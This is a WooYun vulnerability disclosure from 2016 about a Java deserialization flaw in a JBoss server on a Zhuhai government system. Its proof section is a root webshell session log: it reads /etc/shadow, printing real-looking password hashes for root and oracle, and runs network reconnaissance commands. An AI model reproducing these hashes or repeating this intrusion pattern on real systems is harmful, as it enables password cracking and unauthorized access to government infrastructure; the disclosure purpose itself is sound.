珠海市政府某系统存在“Java 反序列化”漏洞，并getshell

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0167125

漏洞标题：珠海市政府某系统存在“Java 反序列化”漏洞，并getshell

漏洞作者：朱元璋

提交时间：2016-01-04 11:30

修复时间：2016-02-22 17:50

公开时间：2016-02-22 17:50

漏洞类型：系统/服务补丁不及时

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-01-04：细节已通知厂商并且等待厂商处理中
2016-01-08：厂商已经确认，细节仅向厂商公开
2016-01-18：细节向核心白帽子及相关领域专家公开
2016-01-28：细节向普通白帽子公开
2016-02-07：细节向实习白帽子公开
2016-02-22：细节向公众公开
简要描述：

详细说明：

地址**.**.**.**:8080/存在“Java 反序列化”漏洞
直接上传木马到服务器中
漏洞证明：

/home/jboss-4.2.2.GA/server/default/./deploy/jmx-console.war/jmx-console>whoami
============================================================================================================r
root
/home/jboss-4.2.2.GA/server/default/./deploy/jmx-console.war/jmx-console>chkconfig --list
============================================================================================================r
NetworkManager 	0:å³é	1:å³é	2:å¯ç¨	3:å¯ç¨	4:å¯ç¨	5:å¯ç¨	6:å³é
abrt-ccpp      	0:å³é	1:å³é	2:å³é	3:å¯ç¨	4:å³é	5:å¯ç¨	6:å³é
abrtd          	0:å³é	1:å³é	2:å³é	3:å¯ç¨	4:å³é	5:å¯ç¨	6:å³é
acpid          	0:å³é	1:å³é	2:å¯ç¨	3:å¯ç¨	4:å¯ç¨	5:å¯ç¨	6:å³é
atd            	0:å³é	1:å³é	2:å³é	3:å¯ç¨	4:å¯ç¨	5:å¯ç¨	6:å³é
auditd         	0:å³é	1:å³é	2:å¯ç¨	3:å¯ç¨	4:å¯ç¨	5:å¯ç¨	6:å³é
autofs         	0:å³é	1:å³é	2:å³é	3:å¯ç¨	4:å¯ç¨	5:å¯ç¨	6:å³é
blk-availability	0:å³é	1:å¯ç¨	2:å¯ç¨	3:å¯ç¨	4:å¯ç¨	5:å¯ç¨	6:å³é
bluetooth      	0:å³é	1:å³é	2:å³é	3:å¯ç¨	4:å¯ç¨	5:å¯ç¨	6:å³é
certmonger     	0:å³é	1:å³é	2:å³é	3:å¯ç¨	4:å¯ç¨	5:å¯ç¨	6:å³é
cpuspeed       	0:å³é	1:å¯ç¨	2:å¯ç¨	3:å¯ç¨	4:å¯ç¨	5:å¯ç¨	6:å³é
crond          	0:å³é	1:å³é	2:å¯ç¨	3:å¯ç¨	4:å¯ç¨	5:å¯ç¨	6:å³é
cups           	0:å³é	1:å³é	2:å¯ç¨	3:å¯ç¨	4:å¯ç¨	5:å¯ç¨	6:å³é
dnsmasq        	0:å³é	1:å³é	2:å³é	3:å³é	4:å³é	5:å³é	6:å³é
firstboot      	0:å³é	1:å³é	2:å³é	3:å³é	4:å³é	5:å³é	6:å³é
haldaemon      	0:å³é	1:å³é	2:å³é	3:å¯ç¨	4:å¯ç¨	5:å¯ç¨	6:å³é
htcacheclean   	0:å³é	1:å³é	2:å³é	3:å³é	4:å³é	5:å³é	6:å³é
httpd          	0:å³é	1:å³é	2:å³é	3:å³é	4:å³é	5:å³é	6:å³é
ip6tables      	0:å³é	1:å³é	2:å¯ç¨	3:å¯ç¨	4:å¯ç¨	5:å¯ç¨	6:å³é
iptables       	0:å³é	1:å³é	2:å¯ç¨	3:å¯ç¨	4:å¯ç¨	5:å¯ç¨	6:å³é
irqbalance     	0:å³é	1:å³é	2:å³é	3:å¯ç¨	4:å¯ç¨	5:å¯ç¨	6:å³é
kdump          	0:å³é	1:å³é	2:å³é	3:å³é	4:å³é	5:å³é	6:å³é
lvm2-monitor   	0:å³é	1:å¯ç¨	2:å¯ç¨	3:å¯ç¨	4:å¯ç¨	5:å¯ç¨	6:å³é
mdmonitor      	0:å³é	1:å³é	2:å¯ç¨	3:å¯ç¨	4:å¯ç¨	5:å¯ç¨	6:å³é
messagebus     	0:å³é	1:å³é	2:å¯ç¨	3:å¯ç¨	4:å¯ç¨	5:å¯ç¨	6:å³é
netconsole     	0:å³é	1:å³é	2:å³é	3:å³é	4:å³é	5:å³é	6:å³é
netfs          	0:å³é	1:å³é	2:å³é	3:å¯ç¨	4:å¯ç¨	5:å¯ç¨	6:å³é
network        	0:å³é	1:å³é	2:å¯ç¨	3:å¯ç¨	4:å¯ç¨	5:å¯ç¨	6:å³é
nfs            	0:å³é	1:å³é	2:å³é	3:å³é	4:å³é	5:å³é	6:å³é
nfslock        	0:å³é	1:å³é	2:å³é	3:å¯ç¨	4:å¯ç¨	5:å¯ç¨	6:å³é
ntpd           	0:å³é	1:å³é	2:å¯ç¨	3:å¯ç¨	4:å¯ç¨	5:å¯ç¨	6:å³é
ntpdate        	0:å³é	1:å³é	2:å³é	3:å³é	4:å³é	5:å³é	6:å³é
oddjobd        	0:å³é	1:å³é	2:å³é	3:å³é	4:å³é	5:å³é	6:å³é
portreserve    	0:å³é	1:å³é	2:å¯ç¨	3:å¯ç¨	4:å¯ç¨	5:å¯ç¨	6:å³é
postfix        	0:å³é	1:å³é	2:å¯ç¨	3:å¯ç¨	4:å¯ç¨	5:å¯ç¨	6:å³é
psacct         	0:å³é	1:å³é	2:å³é	3:å³é	4:å³é	5:å³é	6:å³é
quota_nld      	0:å³é	1:å³é	2:å³é	3:å³é	4:å³é	5:å³é	6:å³é
rdisc          	0:å³é	1:å³é	2:å³é	3:å³é	4:å³é	5:å³é	6:å³é
restorecond    	0:å³é	1:å³é	2:å³é	3:å³é	4:å³é	5:å³é	6:å³é
rngd           	0:å³é	1:å³é	2:å³é	3:å³é	4:å³é	5:å³é	6:å³é
rpcbind        	0:å³é	1:å³é	2:å¯ç¨	3:å¯ç¨	4:å¯ç¨	5:å¯ç¨	6:å³é
rpcgssd        	0:å³é	1:å³é	2:å³é	3:å¯ç¨	4:å¯ç¨	5:å¯ç¨	6:å³é
rpcsvcgssd     	0:å³é	1:å³é	2:å³é	3:å³é	4:å³é	5:å³é	6:å³é
rsyslog        	0:å³é	1:å³é	2:å¯ç¨	3:å¯ç¨	4:å¯ç¨	5:å¯ç¨	6:å³é
saslauthd      	0:å³é	1:å³é	2:å³é	3:å³é	4:å³é	5:å³é	6:å³é
smartd         	0:å³é	1:å³é	2:å³é	3:å³é	4:å³é	5:å³é	6:å³é
snmpd          	0:å³é	1:å³é	2:å³é	3:å³é	4:å³é	5:å³é	6:å³é
snmptrapd      	0:å³é	1:å³é	2:å³é	3:å³é	4:å³é	5:å³é	6:å³é
spice-vdagentd 	0:å³é	1:å³é	2:å³é	3:å³é	4:å³é	5:å¯ç¨	6:å³é
sshd           	0:å³é	1:å³é	2:å¯ç¨	3:å¯ç¨	4:å¯ç¨	5:å¯ç¨	6:å³é
sssd           	0:å³é	1:å³é	2:å³é	3:å³é	4:å³é	5:å³é	6:å³é
sysstat        	0:å³é	1:å¯ç¨	2:å¯ç¨	3:å¯ç¨	4:å¯ç¨	5:å¯ç¨	6:å³é
udev-post      	0:å³é	1:å¯ç¨	2:å¯ç¨	3:å¯ç¨	4:å¯ç¨	5:å¯ç¨	6:å³é
wdaemon        	0:å³é	1:å³é	2:å³é	3:å³é	4:å³é	5:å³é	6:å³é
winbind        	0:å³é	1:å³é	2:å³é	3:å³é	4:å³é	5:å³é	6:å³é
wpa_supplicant 	0:å³é	1:å³é	2:å³é	3:å³é	4:å³é	5:å³é	6:å³é
ypbind         	0:å³é	1:å³é	2:å³é	3:å³é	4:å³é	5:å³é	6:å³é
/home/jboss-4.2.2.GA/server/default/./deploy/jmx-console.war/jmx-console>cat /etc/shadow
============================================================================================================r
root:$6$aspitZ5X77vD89mq$It/M48RyFqsIuhnhVZOCtV0u4eX04LKxjlofqe7pq9Z.raIzkbddn1gRGfBEHaGLTNqsFQzLDjY8tbwertcQb.:16750:0:99999:7:::
bin:*:15980:0:99999:7:::
daemon:*:15980:0:99999:7:::
adm:*:15980:0:99999:7:::
lp:*:15980:0:99999:7:::
sync:*:15980:0:99999:7:::
shutdown:*:15980:0:99999:7:::
halt:*:15980:0:99999:7:::
mail:*:15980:0:99999:7:::
uucp:*:15980:0:99999:7:::
operator:*:15980:0:99999:7:::
games:*:15980:0:99999:7:::
gopher:*:15980:0:99999:7:::
ftp:*:15980:0:99999:7:::
nobody:*:15980:0:99999:7:::
dbus:!!:16750::::::
usbmuxd:!!:16750::::::
vcsa:!!:16750::::::
rpc:!!:16750:0:99999:7:::
rtkit:!!:16750::::::
avahi-autoipd:!!:16750::::::
abrt:!!:16750::::::
rpcuser:!!:16750::::::
nfsnobody:!!:16750::::::
haldaemon:!!:16750::::::
gdm:!!:16750::::::
ntp:!!:16750::::::
apache:!!:16750::::::
saslauth:!!:16750::::::
postfix:!!:16750::::::
pulse:!!:16750::::::
sshd:!!:16750::::::
tcpdump:!!:16750::::::
oracle:$6$ZMeoanp5$j1vQXyBEvNnhDH0Jr4JEZ6W6zFAcvtcimZ6THx9hahjulg8mXVH/TwVmdYFBXrtW3OR9E0iatpOcasnOodu/K1:16751:0:99999:7:::
/home/jboss-4.2.2.GA/server/default/./deploy/jmx-console.war/jmx-console>ifconfig
============================================================================================================r
eth0      Link encap:Ethernet  HWaddr 40:F2:E9:22:84:6A  
          inet addr:**.**.**.**  Bcast:**.**.**.**  Mask:**.**.**.**
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:222575305 errors:0 dropped:0 overruns:4031 frame:0
          TX packets:2147483647 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          Memory:c5a60000-c5a80000 
eth1      Link encap:Ethernet  HWaddr 40:F2:E9:22:84:6B  
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          Memory:c5a40000-c5a60000 
eth2      Link encap:Ethernet  HWaddr 40:F2:E9:22:84:6C  
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          Memory:c5a20000-c5a40000 
eth3      Link encap:Ethernet  HWaddr 40:F2:E9:22:84:6D  
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          Memory:c5a00000-c5a20000 
lo        Link encap:Local Loopback  
          inet addr:**.**.**.**  Mask:**.**.**.**
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:92925537 errors:0 dropped:0 overruns:0 frame:0
          TX packets:92925537 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
usb0      Link encap:Ethernet  HWaddr 42:F2:E9:22:84:69  
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:3573312 errors:0 dropped:0 overruns:0 frame:0
          TX packets:3 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
/home/jboss-4.2.2.GA/server/default/./deploy/jmx-console.war/jmx-console>lsb_release -a
============================================================================================================r
LSB Version:	:base-4.0-amd64:base-4.0-noarch:core-4.0-amd64:core-4.0-noarch:graphics-4.0-amd64:graphics-4.0-noarch:printing-4.0-amd64:printing-4.0-noarch
Distributor ID:	CentOS
Description:	CentOS release 6.5 (Final)
Release:	6.5
Codename:	Final
/home/jboss-4.2.2.GA/server/default/./deploy/jmx-console.war/jmx-console>arp -a
============================================================================================================r
? (**.**.**.**) at 00:12:80:56:99:80 [ether] on eth0
/home/jboss-4.2.2.GA/server/default/./deploy/jmx-console.war/jmx-console>route
============================================================================================================r
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
**.**.**.**     *               **.**.**.**   U     0      0        0 eth0
link-local      *               **.**.**.**     U     1002   0        0 eth0
default         **.**.**.**   **.**.**.**         UG    0      0        0 eth0
/home/jboss-4.2.2.GA/server/default/./deploy/jmx-console.war/jmx-console>netstat -ano
============================================================================================================r
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       Timer
tcp        0      0 **.**.**.**:1099            **.**.**.**:*               LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:111             **.**.**.**:*               LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:8080            **.**.**.**:*               LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:16499     **.**.**.**:*               LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:8083            **.**.**.**:*               LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:22              **.**.**.**:*               LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:38135           **.**.**.**:*               LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:631           **.**.**.**:*               LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:25            **.**.**.**:*               LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:4444            **.**.**.**:*               LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:6012            **.**.**.**:*               LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:37020           **.**.**.**:*               LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:8093            **.**.**.**:*               LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:4445            **.**.**.**:*               LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:4446            **.**.**.**:*               LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:3973      **.**.**.**:*               LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:43304           **.**.**.**:*               LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:8009            **.**.**.**:*               LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:1098            **.**.**.**:*               LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:39491         **.**.**.**:1521          ESTABLISHED off (0.00/0/0)
tcp        1      0 **.**.**.**:28364     **.**.**.**:80        CLOSE_WAIT  off (0.00/0/0)
tcp        0      0 **.**.**.**:56261     **.**.**.**:1521      ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:29374     **.**.**.**:80         ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:8080      **.**.**.**:4940      ESTABLISHED off (0.00/0/0)
tcp        1      0 **.**.**.**:8080        **.**.**.**:26426       CLOSE_WAIT  off (0.00/0/0)
udp        0      0 **.**.**.**:111             **.**.**.**:*                           off (0.00/0/0)
udp        0      0 **.**.**.**:1010            **.**.**.**:*                           off (0.00/0/0)
udp        0      0 **.**.**.**:25075     **.**.**.**:*                           off (0.00/0/0)
udp        0      0 **.**.**.**:631             **.**.**.**:*                           off (0.00/0/0)
udp        0      0 **.**.**.**:632             **.**.**.**:*                           off (0.00/0/0)
udp        0      0 **.**.**.**:123       **.**.**.**:*                           off (0.00/0/0)
udp        0      0 **.**.**.**:123           **.**.**.**:*                           off (0.00/0/0)
udp        0      0 **.**.**.**:123             **.**.**.**:*                           off (0.00/0/0)
udp        0      0 **.**.**.**:8259            **.**.**.**:*                           off (0.00/0/0)
udp        0      0 **.**.**.**:7500            **.**.**.**:*                           off (0.00/0/0)
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags       Type       State         I-Node Path
unix  2      [ ACC ]     STREAM     LISTENING     13601  /var/run/cups/cups.sock
unix  2      [ ACC ]     STREAM     LISTENING     15015  /tmp/.X11-unix/X0
unix  2      [ ACC ]     STREAM     LISTENING     16551  /tmp/.ICE-unix/2673
unix  2      [ ACC ]     STREAM     LISTENING     16573  /tmp/orbit-root/linc-ab5-0-13eb25979fd46
unix  2      [ ACC ]     STREAM     LISTENING     13133  /var/run/rpcbind.sock
unix  2      [ ACC ]     STREAM     LISTENING     16815  /tmp/orbit-root/linc-a71-0-1861f820a5cd7
unix  2      [ ACC ]     STREAM     LISTENING     16908  /tmp/orbit-root/linc-a67-0-11cad70cd8e40
unix  2      [ ACC ]     STREAM     LISTENING     16912  /tmp/keyring-08RRux/socket.ssh
unix  2      [ ACC ]     STREAM     LISTENING     13203  /var/run/dbus/system_bus_socket
unix  2      [ ACC ]     STREAM     LISTENING     16914  /tmp/keyring-08RRux/socket.pkcs11
unix  2      [ ACC ]     STREAM     LISTENING     16991  /tmp/orbit-root/linc-abe-0-502750df141
unix  2      [ ACC ]     STREAM     LISTENING     17133  /tmp/orbit-root/linc-ac6-0-7db5087b1f59a
unix  2      [ ACC ]     STREAM     LISTENING     16550  @/tmp/.ICE-unix/2673
unix  20     [ ]         DGRAM                    12826  /dev/log
unix  2      [ ACC ]     STREAM     LISTENING     13673  /var/run/acpid.socket
unix  2      [ ACC ]     STREAM     LISTENING     13744  @/var/run/hald/dbus-9NCC25lyNz
unix  2      [ ACC ]     STREAM     LISTENING     14617  /var/run/abrt/abrt.socket
unix  2      [ ACC ]     STREAM     LISTENING     14470  private/rewrite
unix  2      [ ACC ]     STREAM     LISTENING     14474  private/bounce
unix  2      [ ACC ]     STREAM     LISTENING     8674   @/com/ubuntu/upstart
unix  2      [ ACC ]     STREAM     LISTENING     16480  @/tmp/dbus-i6cjQRwfHU
unix  2      [ ACC ]     STREAM     LISTENING     14478  private/defer
unix  2      [ ACC ]     STREAM     LISTENING     14482  private/trace
unix  2      [ ACC ]     STREAM     LISTENING     14486  private/verify
unix  2      [ ACC ]     STREAM     LISTENING     14490  public/flush
unix  2      [ ACC ]     STREAM     LISTENING     14494  private/proxymap
unix  2      [ ACC ]     STREAM     LISTENING     14498  private/proxywrite
unix  2      [ ACC ]     STREAM     LISTENING     14502  private/smtp
unix  2      [ ACC ]     STREAM     LISTENING     14506  private/relay
unix  2      [ ACC ]     STREAM     LISTENING     14510  public/showq
unix  2      [ ACC ]     STREAM     LISTENING     14514  private/error
unix  2      [ ACC ]     STREAM     LISTENING     14518  private/retry
unix  2      [ ACC ]     STREAM     LISTENING     14522  private/discard
unix  2      [ ACC ]     STREAM     LISTENING     14526  private/local
unix  2      [ ACC ]     STREAM     LISTENING     14530  private/virtual
unix  2      [ ACC ]     STREAM     LISTENING     14534  private/lmtp
unix  2      [ ACC ]     STREAM     LISTENING     14538  private/anvil
unix  2      [ ACC ]     STREAM     LISTENING     14542  private/scache
unix  2      [ ACC ]     STREAM     LISTENING     15014  @/tmp/.X11-unix/X0
unix  2      [ ]         DGRAM                    10242  @/org/kernel/udev/udevd
unix  2      [ ACC ]     STREAM     LISTENING     15240  @/tmp/gdm-session-IqXKaYAH
unix  2      [ ACC ]     STREAM     LISTENING     16217  /tmp/keyring-08RRux/socket
unix  2      [ ]         DGRAM                    13826  @/org/freedesktop/hal/udev_event
unix  2      [ ACC ]     STREAM     LISTENING     17191  /tmp/orbit-root/linc-acf-0-4d99a72c2606e
unix  2      [ ACC ]     STREAM     LISTENING     17271  /tmp/orbit-root/linc-ad3-0-7d60104053393
unix  2      [ ACC ]     STREAM     LISTENING     17348  /tmp/orbit-root/linc-adf-0-43a6dd3c6c6b3
unix  2      [ ACC ]     STREAM     LISTENING     17455  /tmp/orbit-root/linc-ae7-0-4ebdda587945e
unix  2      [ ACC ]     STREAM     LISTENING     17459  /tmp/orbit-root/linc-ae5-0-2c56f0f179505
unix  2      [ ACC ]     STREAM     LISTENING     18253  /tmp/orbit-root/linc-b2f-0-4416838bb5f30
unix  2      [ ACC ]     STREAM     LISTENING     23447  /var/tmp/.oracle/s#3549.1
unix  2      [ ACC ]     STREAM     LISTENING     19002  /tmp/orbit-root/linc-bd8-0-3205b7351ccef
unix  2      [ ACC ]     STREAM     LISTENING     18525  /tmp/orbit-root/linc-b49-0-4f813883cc81c
unix  2      [ ACC ]     STREAM     LISTENING     18417  /tmp/orbit-root/linc-af5-0-4595ad0c2518
unix  2      [ ACC ]     STREAM     LISTENING     118461 /tmp/orbit-root/linc-3897-0-5e1588014d769
unix  2      [ ACC ]     STREAM     LISTENING     13739  @/var/run/hald/dbus-HjcjQ8ncHW
unix  2      [ ACC ]     STREAM     LISTENING     23449  /var/tmp/.oracle/s#3549.2
unix  2      [ ACC ]     STREAM     LISTENING     18541  /tmp/orbit-root/linc-bc7-0-626c4b87cfd70
unix  2      [ ACC ]     STREAM     LISTENING     18575  /tmp/orbit-root/linc-add-0-77b73e82d3d58
unix  2      [ ACC ]     STREAM     LISTENING     18597  /tmp/orbit-root/linc-b09-0-5e5e87ecdcf0e
unix  2      [ ACC ]     STREAM     LISTENING     18706  /tmp/orbit-root/linc-bca-0-5fae6b7bf30be
unix  2      [ ACC ]     STREAM     LISTENING     18965  /tmp/orbit-root/linc-bdc-0-490967cc1289c
unix  2      [ ACC ]     STREAM     LISTENING     19072  /tmp/orbit-root/linc-bda-0-3182140b3a134
unix  2      [ ACC ]     STREAM     LISTENING     19094  /tmp/orbit-root/linc-afb-0-4a2082fe4636d
unix  2      [ ACC ]     STREAM     LISTENING     19113  /tmp/orbit-root/linc-bd6-0-35f24f8ebee2a
unix  2      [ ACC ]     STREAM     LISTENING     15086  @/tmp/gdm-greeter-XOoopdAu
unix  2      [ ACC ]     STREAM     LISTENING     542316 /tmp/orbit-root/linc-1fc0-0-674e8ba6b8b80
unix  2      [ ACC ]     STREAM     LISTENING     14459  public/cleanup
unix  2      [ ACC ]     STREAM     LISTENING     14466  private/tlsmgr
unix  2      [ ACC ]     STREAM     LISTENING     18629  @/tmp/dbus-eNxFiNQYm9
unix  2      [ ]         DGRAM                    560914264 
unix  2      [ ]         STREAM     CONNECTED     2147483647 
unix  2      [ ]         STREAM     CONNECTED     2147483647 
unix  2      [ ]         DGRAM                    2125104334 
unix  2      [ ]         DGRAM                    668250 
unix  2      [ ]         DGRAM                    545186 
unix  3      [ ]         STREAM     CONNECTED     542465 /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     542324 
unix  2      [ ]         STREAM     CONNECTED     542319 /tmp/orbit-root/linc-1fc0-0-674e8ba6b8b80
unix  2      [ ]         STREAM     CONNECTED     542314 
unix  2      [ ]         STREAM     CONNECTED     542306 
unix  2      [ ]         DGRAM                    318736 
unix  3      [ ]         STREAM     CONNECTED     318675 /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     318674 
unix  3      [ ]         STREAM     CONNECTED     318666 /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     318665 
unix  3      [ ]         STREAM     CONNECTED     118468 @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     118467 
unix  3      [ ]         STREAM     CONNECTED     118466 @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     118465 
unix  3      [ ]         STREAM     CONNECTED     118464 /tmp/orbit-root/linc-3897-0-5e1588014d769
unix  3      [ ]         STREAM     CONNECTED     118463 
unix  3      [ ]         STREAM     CONNECTED     118460 /tmp/orbit-root/linc-ab5-0-13eb25979fd46
unix  3      [ ]         STREAM     CONNECTED     118459 
unix  3      [ ]         STREAM     CONNECTED     118456 @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     118455 
unix  3      [ ]         STREAM     CONNECTED     118451 @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     118450 
unix  3      [ ]         STREAM     CONNECTED     19286  @/dbus-vfs-daemon/socket-WqHJit8W
unix  3      [ ]         STREAM     CONNECTED     19285  
unix  3      [ ]         STREAM     CONNECTED     19284  @/dbus-vfs-daemon/socket-cIcAMcyD
unix  3      [ ]         STREAM     CONNECTED     19283  
unix  3      [ ]         STREAM     CONNECTED     19275  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     19274  
unix  3      [ ]         STREAM     CONNECTED     19216  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     19215  
unix  3      [ ]         STREAM     CONNECTED     19212  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     19211  
unix  3      [ ]         STREAM     CONNECTED     19210  /tmp/orbit-root/linc-ad3-0-7d60104053393
unix  3      [ ]         STREAM     CONNECTED     19209  
unix  3      [ ]         STREAM     CONNECTED     19208  @/tmp/dbus-eNxFiNQYm9
unix  3      [ ]         STREAM     CONNECTED     19207  
unix  3      [ ]         STREAM     CONNECTED     19182  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     19181  
unix  3      [ ]         STREAM     CONNECTED     19180  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     19179  
unix  3      [ ]         STREAM     CONNECTED     19178  /tmp/orbit-root/linc-ad3-0-7d60104053393
unix  3      [ ]         STREAM     CONNECTED     19177  
unix  3      [ ]         STREAM     CONNECTED     19174  /tmp/orbit-root/linc-ad3-0-7d60104053393
unix  3      [ ]         STREAM     CONNECTED     19173  
unix  3      [ ]         STREAM     CONNECTED     19172  /tmp/orbit-root/linc-bd6-0-35f24f8ebee2a
unix  3      [ ]         STREAM     CONNECTED     19171  
unix  3      [ ]         STREAM     CONNECTED     19170  /tmp/orbit-root/linc-bda-0-3182140b3a134
unix  3      [ ]         STREAM     CONNECTED     19169  
unix  3      [ ]         STREAM     CONNECTED     19168  /tmp/orbit-root/linc-bd8-0-3205b7351ccef
unix  3      [ ]         STREAM     CONNECTED     19167  
unix  3      [ ]         STREAM     CONNECTED     19160  @/dbus-vfs-daemon/socket-tocKjbRc
unix  3      [ ]         STREAM     CONNECTED     19158  
unix  3      [ ]         STREAM     CONNECTED     19159  @/dbus-vfs-daemon/socket-Q8cH5ihd
unix  3      [ ]         STREAM     CONNECTED     19157  
unix  3      [ ]         STREAM     CONNECTED     19156  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     19155  
unix  3      [ ]         STREAM     CONNECTED     19154  /tmp/orbit-root/linc-bd6-0-35f24f8ebee2a
unix  3      [ ]         STREAM     CONNECTED     19153  
unix  3      [ ]         STREAM     CONNECTED     19152  /tmp/orbit-root/linc-adf-0-43a6dd3c6c6b3
unix  3      [ ]         STREAM     CONNECTED     19151  
unix  3      [ ]         STREAM     CONNECTED     19150  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     19149  
unix  3      [ ]         STREAM     CONNECTED     19146  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     19145  
unix  3      [ ]         STREAM     CONNECTED     19141  @/tmp/dbus-eNxFiNQYm9
unix  3      [ ]         STREAM     CONNECTED     19140  
unix  3      [ ]         STREAM     CONNECTED     19134  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     19133  
unix  3      [ ]         STREAM     CONNECTED     19132  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     19131  
unix  3      [ ]         STREAM     CONNECTED     19127  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     19125  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     19124  
unix  3      [ ]         STREAM     CONNECTED     19123  
unix  3      [ ]         STREAM     CONNECTED     19118  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     19117  
unix  3      [ ]         STREAM     CONNECTED     19116  /tmp/orbit-root/linc-bd6-0-35f24f8ebee2a
unix  3      [ ]         STREAM     CONNECTED     19115  
unix  3      [ ]         STREAM     CONNECTED     19112  /tmp/orbit-root/linc-ab5-0-13eb25979fd46
unix  3      [ ]         STREAM     CONNECTED     19111  
unix  3      [ ]         STREAM     CONNECTED     19108  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     19107  
unix  3      [ ]         STREAM     CONNECTED     19104  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     19103  
unix  3      [ ]         STREAM     CONNECTED     19100  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     19099  
unix  3      [ ]         STREAM     CONNECTED     19097  /tmp/orbit-root/linc-afb-0-4a2082fe4636d
unix  3      [ ]         STREAM     CONNECTED     19096  
unix  3      [ ]         STREAM     CONNECTED     19093  /tmp/orbit-root/linc-ab5-0-13eb25979fd46
unix  3      [ ]         STREAM     CONNECTED     19092  
unix  3      [ ]         STREAM     CONNECTED     19089  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     19088  
unix  3      [ ]         STREAM     CONNECTED     19085  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     19084  
unix  3      [ ]         STREAM     CONNECTED     19081  /tmp/orbit-root/linc-bda-0-3182140b3a134
unix  3      [ ]         STREAM     CONNECTED     19080  
unix  3      [ ]         STREAM     CONNECTED     19079  /tmp/orbit-root/linc-ab5-0-13eb25979fd46
unix  3      [ ]         STREAM     CONNECTED     19078  
unix  3      [ ]         STREAM     CONNECTED     19077  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     19076  
unix  3      [ ]         STREAM     CONNECTED     19075  /tmp/orbit-root/linc-bda-0-3182140b3a134
unix  3      [ ]         STREAM     CONNECTED     19074  
unix  3      [ ]         STREAM     CONNECTED     19071  /tmp/orbit-root/linc-adf-0-43a6dd3c6c6b3
unix  3      [ ]         STREAM     CONNECTED     19070  
unix  3      [ ]         STREAM     CONNECTED     19065  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     19064  
